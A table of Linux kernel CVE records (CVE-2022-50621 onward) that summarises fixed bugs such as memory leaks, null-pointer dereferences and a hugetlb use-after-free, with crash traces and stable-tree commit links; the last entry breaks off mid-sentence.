| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dm: verity-loadpin: Only trust verity targets with enforcement Verity targets can be configured to ignore corrupted data blocks. LoadPin must only trust verity targets that are configured to perform some kind of enforcement when data corruption is detected, like returning an error, restarting the system or triggering a panic. | 2025-12-08 | not yet calculated | CVE-2022-50621 | https://git.kernel.org/stable/c/cb1f5b76e39d86c98722696bdf632987aa777b83 https://git.kernel.org/stable/c/916ef6232cc4b84db7082b4c3d3cf1753d9462ba |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: fix potential memory leak in ext4_fc_record_modified_inode() As krealloc may return NULL, in this case 'state->fc_modified_inodes' may not be freed by krealloc, but 'state->fc_modified_inodes' already set NULL. Then will lead to 'state->fc_modified_inodes' memory leak. | 2025-12-08 | not yet calculated | CVE-2022-50622 | https://git.kernel.org/stable/c/c9ce7766dc4e88e624c62a68221a3bbe8f06e856 https://git.kernel.org/stable/c/9b5eb368a86f97eb9831f5b53b8e43ec69bc7cd4 https://git.kernel.org/stable/c/c0be17635f039f864b1108efec0015c73736e414 https://git.kernel.org/stable/c/24d39affc6be1acf6df86a8c3e2413b8a73749c7 https://git.kernel.org/stable/c/9305721a309fa1bd7c194e0d4a2335bf3b29dca4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fpga: prevent integer overflow in dfl_feature_ioctl_set_irq() The "hdr.count * sizeof(s32)" multiplication can overflow on 32 bit systems leading to memory corruption. Use array_size() to fix that. | 2025-12-08 | not yet calculated | CVE-2022-50623 | https://git.kernel.org/stable/c/f59861946fa51bcc1f305809e4ebc1013b0ee61c https://git.kernel.org/stable/c/b94605f5cb99e90c8ca91523597a40e1bd59546b https://git.kernel.org/stable/c/1b5a931594f7ffd26d706614c37d4da0f2ffb6e7 https://git.kernel.org/stable/c/940253af8b3865b76de8d1b46bcd4a700104852e https://git.kernel.org/stable/c/939bc5453b8cbdde9f1e5110ce8309aedb1b501a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: netsec: fix error handling in netsec_register_mdio() If phy_device_register() fails, phy_device_free() need be called to put refcount, so memory of phy device and device name can be freed in callback function. If get_phy_device() fails, mdiobus_unregister() need be called, or it will cause warning in mdiobus_free() and kobject is leaked. | 2025-12-08 | not yet calculated | CVE-2022-50624 | https://git.kernel.org/stable/c/728884b22d83148a330b23f9472f1e118b589211 https://git.kernel.org/stable/c/fda2d07234a21be4d71ebfe97a45f499726902d6 https://git.kernel.org/stable/c/62f0a08e82a6312efd7df7f595c0b11d4ffde610 https://git.kernel.org/stable/c/1e0bee973ef6fc3c1e3acb014515eaea37c8fa17 https://git.kernel.org/stable/c/846e677daf51220d7975c61a20e440a88473951e https://git.kernel.org/stable/c/94423589689124e8cd145b38a1034be7f25835b2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: serial: amba-pl011: avoid SBSA UART accessing DMACR register Chapter "B Generic UART" in "ARM Server Base System Architecture" [1] documentation describes a generic UART interface. Such generic UART does not support DMA. In current code, sbsa_uart_pops and amba_pl011_pops share the same stop_rx operation, which will invoke pl011_dma_rx_stop, leading to an access of the DMACR register. This commit adds a using_rx_dma check in pl011_dma_rx_stop to avoid the access to DMACR register for SBSA UARTs which does not support DMA. When the kernel enables DMA engine with "CONFIG_DMA_ENGINE=y", Linux SBSA PL011 driver will access PL011 DMACR register in some functions. For most real SBSA Pl011 hardware implementations, the DMACR write behaviour will be ignored. So these DMACR operations will not cause obvious problems. But for some virtual SBSA PL011 hardware, like Xen virtual SBSA PL011 (vpl011) device, the behaviour might be different. Xen vpl011 emulation will inject a data abort to guest, when guest is accessing an unimplemented UART register. As Xen VPL011 is SBSA compatible, it will not implement DMACR register. So when Linux SBSA PL011 driver access DMACR register, it will get an unhandled data abort fault and the application will get a segmentation fault: Unhandled fault at 0xffffffc00944d048 Mem abort info: ESR = 0x96000000 EC = 0x25: DABT (current EL), IL = 32 bits SET = 0, FnV = 0 EA = 0, S1PTW = 0 FSC = 0x00: ttbr address size fault Data abort info: ISV = 0, ISS = 0x00000000 CM = 0, WnR = 0 swapper pgtable: 4k pages, 39-bit VAs, pgdp=0000000020e2e000 [ffffffc00944d048] pgd=100000003ffff803, p4d=100000003ffff803, pud=100000003ffff803, pmd=100000003fffa803, pte=006800009c090f13 Internal error: ttbr address size fault: 96000000 [#1] PREEMPT SMP ... Call trace: pl011_stop_rx+0x70/0x80 tty_port_shutdown+0x7c/0xb4 tty_port_close+0x60/0xcc uart_close+0x34/0x8c tty_release+0x144/0x4c0 __fput+0x78/0x220 ____fput+0x1c/0x30 task_work_run+0x88/0xc0 do_notify_resume+0x8d0/0x123c el0_svc+0xa8/0xc0 el0t_64_sync_handler+0xa4/0x130 el0t_64_sync+0x1a0/0x1a4 Code: b9000083 b901f001 794038a0 8b000042 (b9000041) ---[ end trace 83dd93df15c3216f ]--- note: bootlogd[132] exited with preempt_count 1 /etc/rcS.d/S07bootlogd: line 47: 132 Segmentation fault start-stop-daemon This has been discussed in the Xen community, and we think it should fix this in Linux. See [2] for more information. [1] https://developer.arm.com/documentation/den0094/c/?lang=en [2] https://lists.xenproject.org/archives/html/xen-devel/2022-11/msg00543.html | 2025-12-08 | not yet calculated | CVE-2022-50625 | https://git.kernel.org/stable/c/1c5f0d3f480abd8c26761b6b1f486822e77faea3 https://git.kernel.org/stable/c/a4ea20ab82aa2b197dc7b08f51e1d615578276a0 https://git.kernel.org/stable/c/78d837ce20517e0c1ff3ebe08ad64636e02c2e48 https://git.kernel.org/stable/c/965f07ea5fd1b9591bcccc825a93ad883e56222c https://git.kernel.org/stable/c/d5b16eb076f46c88d02d41ece5bec4e0d89158bb https://git.kernel.org/stable/c/d71a611fca1984c0765f9317ff471ac8cd0e3e2f https://git.kernel.org/stable/c/38a10fdd54d17590d45cb1c43b9889da383b6b1a https://git.kernel.org/stable/c/64bc5dbc3260230e2f022288c71e5c680059384a https://git.kernel.org/stable/c/94cdb9f33698478b0e7062586633c42c6158a786 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: dvb-usb: fix memory leak in dvb_usb_adapter_init() Syzbot reports a memory leak in "dvb_usb_adapter_init()". The leak is due to not accounting for and freeing current iteration's adapter->priv in case of an error. Currently if an error occurs, it will exit before incrementing "num_adapters_initalized", which is used as a reference counter to free all adap->priv in "dvb_usb_adapter_exit()". There are multiple error paths that can exit from before incrementing the counter. Including the error handling paths for "dvb_usb_adapter_stream_init()", "dvb_usb_adapter_dvb_init()" and "dvb_usb_adapter_frontend_init()" within "dvb_usb_adapter_init()". This means that in case of an error in any of these functions the current iteration is not accounted for and the current iteration's adap->priv is not freed. Fix this by freeing the current iteration's adap->priv in the "stream_init_err:" label in the error path. The rest of the (accounted for) adap->priv objects are freed in dvb_usb_adapter_exit() as expected using the num_adapters_initalized variable. Syzbot report: BUG: memory leak unreferenced object 0xffff8881172f1a00 (size 512): comm "kworker/0:2", pid 139, jiffies 4294994873 (age 10.960s) hex dump (first 32 bytes): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ backtrace: [<ffffffff844af012>] dvb_usb_adapter_init drivers/media/usb/dvb-usb/dvb-usb-init.c:75 [inline] [<ffffffff844af012>] dvb_usb_init drivers/media/usb/dvb-usb/dvb-usb-init.c:184 [inline] [<ffffffff844af012>] dvb_usb_device_init.cold+0x4e5/0x79e drivers/media/usb/dvb-usb/dvb-usb-init.c:308 [<ffffffff830db21d>] dib0700_probe+0x8d/0x1b0 drivers/media/usb/dvb-usb/dib0700_core.c:883 [<ffffffff82d3fdc7>] usb_probe_interface+0x177/0x370 drivers/usb/core/driver.c:396 [<ffffffff8274ab37>] call_driver_probe drivers/base/dd.c:542 [inline] [<ffffffff8274ab37>] really_probe.part.0+0xe7/0x310 drivers/base/dd.c:621 [<ffffffff8274ae6c>] really_probe drivers/base/dd.c:583 [inline] [<ffffffff8274ae6c>] __driver_probe_device+0x10c/0x1e0 drivers/base/dd.c:752 [<ffffffff8274af6a>] driver_probe_device+0x2a/0x120 drivers/base/dd.c:782 [<ffffffff8274b786>] __device_attach_driver+0xf6/0x140 drivers/base/dd.c:899 [<ffffffff82747c87>] bus_for_each_drv+0xb7/0x100 drivers/base/bus.c:427 [<ffffffff8274b352>] __device_attach+0x122/0x260 drivers/base/dd.c:970 [<ffffffff827498f6>] bus_probe_device+0xc6/0xe0 drivers/base/bus.c:487 [<ffffffff82745cdb>] device_add+0x5fb/0xdf0 drivers/base/core.c:3405 [<ffffffff82d3d202>] usb_set_configuration+0x8f2/0xb80 drivers/usb/core/message.c:2170 [<ffffffff82d4dbfc>] usb_generic_driver_probe+0x8c/0xc0 drivers/usb/core/generic.c:238 [<ffffffff82d3f49c>] usb_probe_device+0x5c/0x140 drivers/usb/core/driver.c:293 [<ffffffff8274ab37>] call_driver_probe drivers/base/dd.c:542 [inline] [<ffffffff8274ab37>] really_probe.part.0+0xe7/0x310 drivers/base/dd.c:621 [<ffffffff8274ae6c>] really_probe drivers/base/dd.c:583 [inline] [<ffffffff8274ae6c>] __driver_probe_device+0x10c/0x1e0 drivers/base/dd.c:752 | 2025-12-08 | not yet calculated | CVE-2022-50626 | https://git.kernel.org/stable/c/733bc9e226da2a7f43b10031b8ebfc26d89ec4bd https://git.kernel.org/stable/c/e5a49140035591d13ff57a7537c65217e5af0d15 https://git.kernel.org/stable/c/21b6b0c9f3796e6917e90db403dae9e74025fc40 https://git.kernel.org/stable/c/17217737c174883dd975885ab4bee4b00f517239 https://git.kernel.org/stable/c/7d7ab25ead969594df05fb09ee46ca931d46c5c8 https://git.kernel.org/stable/c/d0af6220bb1eed8225a5511de5a3bd386b94afa4 https://git.kernel.org/stable/c/e5d01eb6dc2f699a395d3e731c58a9b3bb4e269f https://git.kernel.org/stable/c/93bbf2ed428142aa9a9693721230b28571678bf8 https://git.kernel.org/stable/c/94d90fb06b94a90c176270d38861bcba34ce377d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath11k: fix monitor mode bringup crash When the interface is brought up in monitor mode, it leads to NULL pointer dereference crash. This crash happens when the packet type is extracted for a SKB. This extraction which is present in the received msdu delivery path,is not needed for the monitor ring packets since they are all RAW packets. Hence appending the flags with "RX_FLAG_ONLY_MONITOR" to skip that extraction. Observed calltrace: Unable to handle kernel NULL pointer dereference at virtual address 0000000000000064 Mem abort info: ESR = 0x0000000096000004 EC = 0x25: DABT (current EL), IL = 32 bits SET = 0, FnV = 0 EA = 0, S1PTW = 0 FSC = 0x04: level 0 translation fault Data abort info: ISV = 0, ISS = 0x00000004 CM = 0, WnR = 0 user pgtable: 4k pages, 48-bit VAs, pgdp=0000000048517000 [0000000000000064] pgd=0000000000000000, p4d=0000000000000000 Internal error: Oops: 0000000096000004 [#1] PREEMPT SMP Modules linked in: ath11k_pci ath11k qmi_helpers CPU: 2 PID: 1781 Comm: napi/-271 Not tainted 6.1.0-rc5-wt-ath-656295-gef907406320c-dirty #6 Hardware name: Qualcomm Technologies, Inc. IPQ8074/AP-HK10-C2 (DT) pstate: 60000005 (nZCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : ath11k_hw_qcn9074_rx_desc_get_decap_type+0x34/0x60 [ath11k] lr : ath11k_hw_qcn9074_rx_desc_get_decap_type+0x5c/0x60 [ath11k] sp : ffff80000ef5bb10 x29: ffff80000ef5bb10 x28: 0000000000000000 x27: ffff000007baafa0 x26: ffff000014a91ed0 x25: 0000000000000000 x24: 0000000000000000 x23: ffff800002b77378 x22: ffff000014a91ec0 x21: ffff000006c8d600 x20: 0000000000000000 x19: ffff800002b77740 x18: 0000000000000006 x17: 736564203634343a x16: 656e694c20657079 x15: 0000000000000143 x14: 00000000ffffffea x13: ffff80000ef5b8b8 x12: ffff80000ef5b8c8 x11: ffff80000a591d30 x10: ffff80000a579d40 x9 : c0000000ffffefff x8 : 0000000000000003 x7 : 0000000000017fe8 x6 : ffff80000a579ce8 x5 : 0000000000000000 x4 : 0000000000000000 x3 : 0000000000000000 x2 : 3a35ec12ed7f8900 x1 : 0000000000000000 x0 : 0000000000000052 Call trace: ath11k_hw_qcn9074_rx_desc_get_decap_type+0x34/0x60 [ath11k] ath11k_dp_rx_deliver_msdu.isra.42+0xa4/0x3d0 [ath11k] ath11k_dp_rx_mon_deliver.isra.43+0x2f8/0x458 [ath11k] ath11k_dp_rx_process_mon_rings+0x310/0x4c0 [ath11k] ath11k_dp_service_srng+0x234/0x338 [ath11k] ath11k_pcic_ext_grp_napi_poll+0x30/0xb8 [ath11k] __napi_poll+0x5c/0x190 napi_threaded_poll+0xf0/0x118 kthread+0xf4/0x110 ret_from_fork+0x10/0x20 Tested-on: QCN9074 hw1.0 PCI WLAN.HK.2.7.0.1-01744-QCAHKSWPL_SILICONZ-1 | 2025-12-08 | not yet calculated | CVE-2022-50627 | https://git.kernel.org/stable/c/d6ea1ca1d456bb661e5a9d104e69d2c261161115 https://git.kernel.org/stable/c/9089c3080a98f1452335e08b8014a28003a211ce https://git.kernel.org/stable/c/950b43f8bd8a4d476d2da6d2a083a89bcd3c90d7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/gud: Fix UBSAN warning UBSAN complains about invalid value for bool: [ 101.165172] [drm] Initialized gud 1.0.0 20200422 for 2-3.2:1.0 on minor 1 [ 101.213360] gud 2-3.2:1.0: [drm] fb1: guddrmfb frame buffer device [ 101.213426] usbcore: registered new interface driver gud [ 101.989431] ================================================================================ [ 101.989441] UBSAN: invalid-load in linux/include/linux/iosys-map.h:253:9 [ 101.989447] load of value 121 is not a valid value for type '_Bool' [ 101.989451] CPU: 1 PID: 455 Comm: kworker/1:6 Not tainted 5.18.0-rc5-gud-5.18-rc5 #3 [ 101.989456] Hardware name: Hewlett-Packard HP EliteBook 820 G1/1991, BIOS L71 Ver. 01.44 04/12/2018 [ 101.989459] Workqueue: events_long gud_flush_work [gud] [ 101.989471] Call Trace: [ 101.989474] <TASK> [ 101.989479] dump_stack_lvl+0x49/0x5f [ 101.989488] dump_stack+0x10/0x12 [ 101.989493] ubsan_epilogue+0x9/0x3b [ 101.989498] __ubsan_handle_load_invalid_value.cold+0x44/0x49 [ 101.989504] dma_buf_vmap.cold+0x38/0x3d [ 101.989511] ? find_busiest_group+0x48/0x300 [ 101.989520] drm_gem_shmem_vmap+0x76/0x1b0 [drm_shmem_helper] [ 101.989528] drm_gem_shmem_object_vmap+0x9/0xb [drm_shmem_helper] [ 101.989535] drm_gem_vmap+0x26/0x60 [drm] [ 101.989594] drm_gem_fb_vmap+0x47/0x150 [drm_kms_helper] [ 101.989630] gud_prep_flush+0xc1/0x710 [gud] [ 101.989639] ? _raw_spin_lock+0x17/0x40 [ 101.989648] gud_flush_work+0x1e0/0x430 [gud] [ 101.989653] ? __switch_to+0x11d/0x470 [ 101.989664] process_one_work+0x21f/0x3f0 [ 101.989673] worker_thread+0x200/0x3e0 [ 101.989679] ? rescuer_thread+0x390/0x390 [ 101.989684] kthread+0xfd/0x130 [ 101.989690] ? kthread_complete_and_exit+0x20/0x20 [ 101.989696] ret_from_fork+0x22/0x30 [ 101.989706] </TASK> [ 101.989708] ================================================================================ The source of this warning is in iosys_map_clear() called from dma_buf_vmap(). It conditionally sets values based on map->is_iomem. The iosys_map variables are allocated uninitialized on the stack leading to ->is_iomem having all kinds of values and not only 0/1. Fix this by zeroing the iosys_map variables. | 2025-12-08 | not yet calculated | CVE-2022-50628 | https://git.kernel.org/stable/c/832f861a46039d50536dcfda0a9fb334b48d0f8b https://git.kernel.org/stable/c/e1078b270d218f8d58efb4d78ea25a4d16ba3490 https://git.kernel.org/stable/c/951df98024f7272f85df5044eca7374f5b5b24ef |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: rsi: Fix memory leak in rsi_coex_attach() The coex_cb needs to be freed when rsi_create_kthread() failed in rsi_coex_attach(). | 2025-12-08 | not yet calculated | CVE-2022-50629 | https://git.kernel.org/stable/c/98259e0b6cf7f021da9fe4e11fbcce6ad6705ffe https://git.kernel.org/stable/c/fe4d7280cf4ddbea6536b596297c07662c7856fc https://git.kernel.org/stable/c/efc8df970561ff708379b89b348e16d3b410cc7b https://git.kernel.org/stable/c/b56e60b3b158a93bc713437e8e466f401ff8cc9f https://git.kernel.org/stable/c/c4f1ded67a90fb3b2e679e2c90b78921d9246044 https://git.kernel.org/stable/c/ace789b1d465fae104cd37e49f6e1bcd1c8ff417 https://git.kernel.org/stable/c/956fb851a6e19da5ab491e19c1bc323bb2c2cf6f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm: hugetlb: fix UAF in hugetlb_handle_userfault The vma_lock and hugetlb_fault_mutex are dropped before handling userfault and reacquire them again after handle_userfault(), but reacquire the vma_lock could lead to UAF[1,2] due to the following race, hugetlb_fault hugetlb_no_page /*unlock vma_lock */ hugetlb_handle_userfault handle_userfault /* unlock mm->mmap_lock*/ vm_mmap_pgoff do_mmap mmap_region munmap_vma_range /* clean old vma */ /* lock vma_lock again <--- UAF */ /* unlock vma_lock */ Since the vma_lock will unlock immediately after hugetlb_handle_userfault(), let's drop the unneeded lock and unlock in hugetlb_handle_userfault() to fix the issue. [1] https://lore.kernel.org/linux-mm/000000000000d5e00a05e834962e@google.com/ [2] https://lore.kernel.org/linux-mm/20220921014457.1668-1-liuzixian4@huawei.com/ | 2025-12-08 | not yet calculated | CVE-2022-50630 | https://git.kernel.org/stable/c/45c33966759ea1b4040c08dacda99ef623c0ca29 https://git.kernel.org/stable/c/0db2efb3bff879566f05341d94c3de00ac95c4cc https://git.kernel.org/stable/c/dd691973f67b2800a97db723b1ff6f07fdcf7f5a https://git.kernel.org/stable/c/78504bcedb2f1bbfb353b4d233c24d641c4dda33 https://git.kernel.org/stable/c/958f32ce832ba781ac20e11bb2d12a9352ea28fc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RISC-V: kexec: Fix memory leak of fdt buffer This is reported by kmemleak detector: unreferenced object 0xff60000082864000 (size 9588): comm "kexec", pid 146, jiffies 4294900634 (age 64.788s) hex dump (first 32 bytes): d0 0d fe ed 00 00 12 ed 00 00 00 48 00 00 11 40 ...........H...@ 00 00 00 28 00 00 00 11 00 00 00 02 00 00 00 00 ...(............ backtrace: [<00000000f95b17c4>] kmemleak_alloc+0x34/0x3e [<00000000b9ec8e3e>] kmalloc_order+0x9c/0xc4 [<00000000a95cf02e>] kmalloc_order_trace+0x34/0xb6 [<00000000f01e68b4>] __kmalloc+0x5c2/0x62a [<000000002bd497b2>] kvmalloc_node+0x66/0xd6 [<00000000906542fa>] of_kexec_alloc_and_setup_fdt+0xa6/0x6ea [<00000000e1166bde>] elf_kexec_load+0x206/0x4ec [<0000000036548e09>] kexec_image_load_default+0x40/0x4c [<0000000079fbe1b4>] sys_kexec_file_load+0x1c4/0x322 [<0000000040c62c03>] ret_from_syscall+0x0/0x2 In elf_kexec_load(), a buffer is allocated via kvmalloc() to store fdt. While it's not freed back to system when kexec kernel is reloaded or unloaded. Then memory leak is caused. Fix it by introducing riscv specific function arch_kimage_file_post_load_cleanup(), and freeing the buffer there. | 2025-12-08 | not yet calculated | CVE-2022-50631 | https://git.kernel.org/stable/c/c66ad198b6497dee8f45d7ed5c03629c4525c7d0 https://git.kernel.org/stable/c/dc387c34d8dd10b02a333df098f8fd9bba177a45 https://git.kernel.org/stable/c/96df59b1ae23f5c11698c3c2159aeb2ecd4944a4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drivers: perf: marvell_cn10k: Fix hotplug callback leak in tad_pmu_init() tad_pmu_init() won't remove the callback added by cpuhp_setup_state_multi() when platform_driver_register() failed. Remove the callback by cpuhp_remove_multi_state() in fail path. Similar to the handling of arm_ccn_init() in commit 26242b330093 ("bus: arm-ccn: Prevent hotplug callback leak") | 2025-12-08 | not yet calculated | CVE-2022-50632 | https://git.kernel.org/stable/c/367404bfd1aa87b2a50059cd8edc6c12c367cd15 https://git.kernel.org/stable/c/7772f4de934123ccd7c7cdc1dc4e46fdd5d767fb https://git.kernel.org/stable/c/973ae93d80d9d262f695eb485a1902b74c4b9098 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: dwc3: qcom: Fix memory leak in dwc3_qcom_interconnect_init of_icc_get() alloc resources for path handle, we should release it when not need anymore. Like the release in dwc3_qcom_interconnect_exit() function. Add icc_put() in error handling to fix this. | 2025-12-09 | not yet calculated | CVE-2022-50633 | https://git.kernel.org/stable/c/f9089b95548f0272e02a89989c511e235561d051 https://git.kernel.org/stable/c/56f6de394f0f57928cd401255a5c7866b68a77e3 https://git.kernel.org/stable/c/8c39c8d23ff9fb1beb6e16cf0ae929c764538625 https://git.kernel.org/stable/c/2f3b51189f7a7be5d822fb8c537d778c57eb9821 https://git.kernel.org/stable/c/97a48da1619ba6bd42a0e5da0a03aa490a9496b1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: power: supply: cw2015: Fix potential null-ptr-deref in cw_bat_probe() cw_bat_probe() calls create_singlethread_workqueue() and not checked the ret value, which may return NULL. And a null-ptr-deref may happen: cw_bat_probe() create_singlethread_workqueue() # failed, cw_bat->wq is NULL queue_delayed_work() queue_delayed_work_on() __queue_delayed_work() # warning here, but continue __queue_work() # access wq->flags, null-ptr-deref Check the ret value and return -ENOMEM if it is NULL. | 2025-12-09 | not yet calculated | CVE-2022-50634 | https://git.kernel.org/stable/c/f7e2ba8ed08138102f21f3fe6414498c93177fd8 https://git.kernel.org/stable/c/5150b76aa2eb8bb8feb7f7a048417f9d39c3dd04 https://git.kernel.org/stable/c/97f2b4ddb0aa700d673691a7d5e44d226d22bab7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: powerpc/kprobes: Fix null pointer reference in arch_prepare_kprobe() I found a null pointer reference in arch_prepare_kprobe(): # echo 'p cmdline_proc_show' > kprobe_events # echo 'p cmdline_proc_show+16' >> kprobe_events Kernel attempted to read user page (0) - exploit attempt? (uid: 0) BUG: Kernel NULL pointer dereference on read at 0x00000000 Faulting instruction address: 0xc000000000050bfc Oops: Kernel access of bad area, sig: 11 [#1] LE PAGE_SIZE=64K MMU=Radix SMP NR_CPUS=2048 NUMA PowerNV Modules linked in: CPU: 0 PID: 122 Comm: sh Not tainted 6.0.0-rc3-00007-gdcf8e5633e2e #10 NIP: c000000000050bfc LR: c000000000050bec CTR: 0000000000005bdc REGS: c0000000348475b0 TRAP: 0300 Not tainted (6.0.0-rc3-00007-gdcf8e5633e2e) MSR: 9000000000009033 <SF,HV,EE,ME,IR,DR,RI,LE> CR: 88002444 XER: 20040006 CFAR: c00000000022d100 DAR: 0000000000000000 DSISR: 40000000 IRQMASK: 0 ... NIP arch_prepare_kprobe+0x10c/0x2d0 LR arch_prepare_kprobe+0xfc/0x2d0 Call Trace: 0xc0000000012f77a0 (unreliable) register_kprobe+0x3c0/0x7a0 __register_trace_kprobe+0x140/0x1a0 __trace_kprobe_create+0x794/0x1040 trace_probe_create+0xc4/0xe0 create_or_delete_trace_kprobe+0x2c/0x80 trace_parse_run_command+0xf0/0x210 probes_write+0x20/0x40 vfs_write+0xfc/0x450 ksys_write+0x84/0x140 system_call_exception+0x17c/0x3a0 system_call_vectored_common+0xe8/0x278 --- interrupt: 3000 at 0x7fffa5682de0 NIP: 00007fffa5682de0 LR: 0000000000000000 CTR: 0000000000000000 REGS: c000000034847e80 TRAP: 3000 Not tainted (6.0.0-rc3-00007-gdcf8e5633e2e) MSR: 900000000280f033 <SF,HV,VEC,VSX,EE,PR,FP,ME,IR,DR,RI,LE> CR: 44002408 XER: 00000000 The address being probed has some special: cmdline_proc_show: Probe based on ftrace cmdline_proc_show+16: Probe for the next instruction at the ftrace location The ftrace-based kprobe does not generate kprobe::ainsn::insn, it gets set to NULL. In arch_prepare_kprobe() it will check for: ... prev = get_kprobe(p->addr - 1); preempt_enable_no_resched(); if (prev && ppc_inst_prefixed(ppc_inst_read(prev->ainsn.insn))) { ... If prev is based on ftrace, 'ppc_inst_read(prev->ainsn.insn)' will occur with a null pointer reference. At this point prev->addr will not be a prefixed instruction, so the check can be skipped. Check if prev is ftrace-based kprobe before reading 'prev->ainsn.insn' to fix this problem. [mpe: Trim oops] | 2025-12-09 | not yet calculated | CVE-2022-50635 | https://git.kernel.org/stable/c/7f536a8cb62dd5c084f112373fc34cdb5168a813 https://git.kernel.org/stable/c/4eac4f6a86ae73ef4b772d37398beeba2fbfde4e https://git.kernel.org/stable/c/5fd1b369387c53ee6c774ab86e32e362a1e537ac https://git.kernel.org/stable/c/97f88a3d723162781d6cbfdc7b9617eefab55b19 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: PCI: Fix pci_device_is_present() for VFs by checking PF pci_device_is_present() previously didn't work for VFs because it reads the Vendor and Device ID, which are 0xffff for VFs, which looks like they aren't present. Check the PF instead. Wei Gong reported that if virtio I/O is in progress when the driver is unbound or "0" is written to /sys/.../sriov_numvfs, the virtio I/O operation hangs, which may result in output like this: task:bash state:D stack: 0 pid: 1773 ppid: 1241 flags:0x00004002 Call Trace: schedule+0x4f/0xc0 blk_mq_freeze_queue_wait+0x69/0xa0 blk_mq_freeze_queue+0x1b/0x20 blk_cleanup_queue+0x3d/0xd0 virtblk_remove+0x3c/0xb0 [virtio_blk] virtio_dev_remove+0x4b/0x80 ... device_unregister+0x1b/0x60 unregister_virtio_device+0x18/0x30 virtio_pci_remove+0x41/0x80 pci_device_remove+0x3e/0xb0 This happened because pci_device_is_present(VF) returned "false" in virtio_pci_remove(), so it called virtio_break_device(). The broken vq meant that vring_interrupt() skipped the vq.callback() that would have completed the virtio I/O operation via virtblk_done(). [bhelgaas: commit log, simplify to always use pci_physfn(), add stable tag] | 2025-12-09 | not yet calculated | CVE-2022-50636 | https://git.kernel.org/stable/c/f4b44c7766dae2b8681f621941cabe9f14066d59 https://git.kernel.org/stable/c/643d77fda08d06f863af35e80a7e517ea61d9629 https://git.kernel.org/stable/c/65bd0962992abd42e77a05e68c7b40e7c73726d1 https://git.kernel.org/stable/c/99ef6cc791584495987dd11b14769b450dfa5820 https://git.kernel.org/stable/c/67fd41bbb0f51aa648a47f728b99e6f1fa2ccc34 https://git.kernel.org/stable/c/81565e51ccaf6fff8910e997ee22e16b5e1dabc3 https://git.kernel.org/stable/c/518573988a2f14f517403db2ece5ddaefba21e94 https://git.kernel.org/stable/c/98b04dd0b4577894520493d96bc4623387767445 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cpufreq: qcom-hw: Fix memory leak in qcom_cpufreq_hw_read_lut() If "cpu_dev" fails to get opp table in qcom_cpufreq_hw_read_lut(), the program will return, resulting in "table" resource is not released. | 2025-12-09 | not yet calculated | CVE-2022-50637 | https://git.kernel.org/stable/c/3ef12a4a8ef5553af9c3fd2719a616637a102568 https://git.kernel.org/stable/c/4ea765b10624d67407817100d381c60f53593033 https://git.kernel.org/stable/c/5d430076e66bddd08612911513b36f932b0d9d6c https://git.kernel.org/stable/c/242e23be8f31ebd90525c57ee3244c28e99a1697 https://git.kernel.org/stable/c/9901c21bcaf2f01fe5078f750d624f4ddfa8f81b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: fix bug_on in __es_tree_search caused by bad boot loader inode We got a issue as fllows: ================================================================== kernel BUG at fs/ext4/extents_status.c:203! invalid opcode: 0000 [#1] PREEMPT SMP CPU: 1 PID: 945 Comm: cat Not tainted 6.0.0-next-20221007-dirty #349 RIP: 0010:ext4_es_end.isra.0+0x34/0x42 RSP: 0018:ffffc9000143b768 EFLAGS: 00010203 RAX: 0000000000000000 RBX: ffff8881769cd0b8 RCX: 0000000000000000 RDX: 0000000000000000 RSI: ffffffff8fc27cf7 RDI: 00000000ffffffff RBP: ffff8881769cd0bc R08: 0000000000000000 R09: ffffc9000143b5f8 R10: 0000000000000001 R11: 0000000000000001 R12: ffff8881769cd0a0 R13: ffff8881768e5668 R14: 00000000768e52f0 R15: 0000000000000000 FS: 00007f359f7f05c0(0000)GS:ffff88842fd00000(0000)knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f359f5a2000 CR3: 000000017130c000 CR4: 00000000000006e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> __es_tree_search.isra.0+0x6d/0xf5 ext4_es_cache_extent+0xfa/0x230 ext4_cache_extents+0xd2/0x110 ext4_find_extent+0x5d5/0x8c0 ext4_ext_map_blocks+0x9c/0x1d30 ext4_map_blocks+0x431/0xa50 ext4_mpage_readpages+0x48e/0xe40 ext4_readahead+0x47/0x50 read_pages+0x82/0x530 page_cache_ra_unbounded+0x199/0x2a0 do_page_cache_ra+0x47/0x70 page_cache_ra_order+0x242/0x400 ondemand_readahead+0x1e8/0x4b0 page_cache_sync_ra+0xf4/0x110 filemap_get_pages+0x131/0xb20 filemap_read+0xda/0x4b0 generic_file_read_iter+0x13a/0x250 ext4_file_read_iter+0x59/0x1d0 vfs_read+0x28f/0x460 ksys_read+0x73/0x160 __x64_sys_read+0x1e/0x30 do_syscall_64+0x35/0x80 entry_SYSCALL_64_after_hwframe+0x63/0xcd </TASK> ================================================================== In the above issue, ioctl invokes the swap_inode_boot_loader function to swap inode<5> and inode<12>. However, inode<5> contain incorrect imode and disordered extents, and i_nlink is set to 1. The extents check for inode in the ext4_iget function can be bypassed bacause 5 is EXT4_BOOT_LOADER_INO. While links_count is set to 1, the extents are not initialized in swap_inode_boot_loader. After the ioctl command is executed successfully, the extents are swapped to inode<12>, in 